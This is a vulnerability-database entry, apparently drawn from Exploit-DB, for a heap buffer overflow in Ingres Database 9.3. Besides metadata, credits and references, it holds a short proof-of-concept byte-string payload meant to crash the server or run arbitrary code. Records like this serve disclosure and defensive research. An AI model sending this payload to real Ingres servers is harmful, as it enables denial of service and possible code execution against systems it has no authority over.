ID
VAR-E-201001-1449
EDB ID
33579
TITLE
Ingres Database 9.3 - Heap Buffer Overflow - Multiple dos Exploit
Trust: 0.6
DESCRIPTION
Ingres Database 9.3 - Heap Buffer Overflow.. dos exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ingres | model: | database | scope: | eq | version: | 9.3 | Trust: 1.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/38001/info
Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application.
Ingres Database 9.3 on Unix is vulnerable; other versions may also be affected.
s = "\x00\x00\x00\x00"
s += "\xff\xff\xff\xff"
s += "\x3c\x00\x00\x00\x06\x00\x00\x00"
s += "A" * 1000
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Heap Buffer Overflow
Trust: 1.0
CREDITS
Evgeny Legerov
Trust: 0.6
EXTERNAL IDS
| db: | BID | id: | 38001 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 33579 | Trust: 1.6 |
| db: | EDBNET | id: | 55017 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/38001/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/33579/ | Trust: 0.6 |
| url: | http://www.ingres.com/ | Trust: 0.3 |
| url: | http://intevydis.blogspot.com/2010/01/ingres-93-heap-overflow.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 38001 |
| db: | EXPLOIT-DB | id: | 33579 |
| db: | EDBNET | id: | 55017 |
LAST UPDATE DATE
2022-07-27T10:01:38.174000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 38001 | date: | 2010-02-09T15:31:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 38001 | date: | 2010-01-29T00:00:00 |
| db: | EXPLOIT-DB | id: | 33579 | date: | 2010-01-29T00:00:00 |
| db: | EDBNET | id: | 55017 | date: | 2010-01-29T00:00:00 |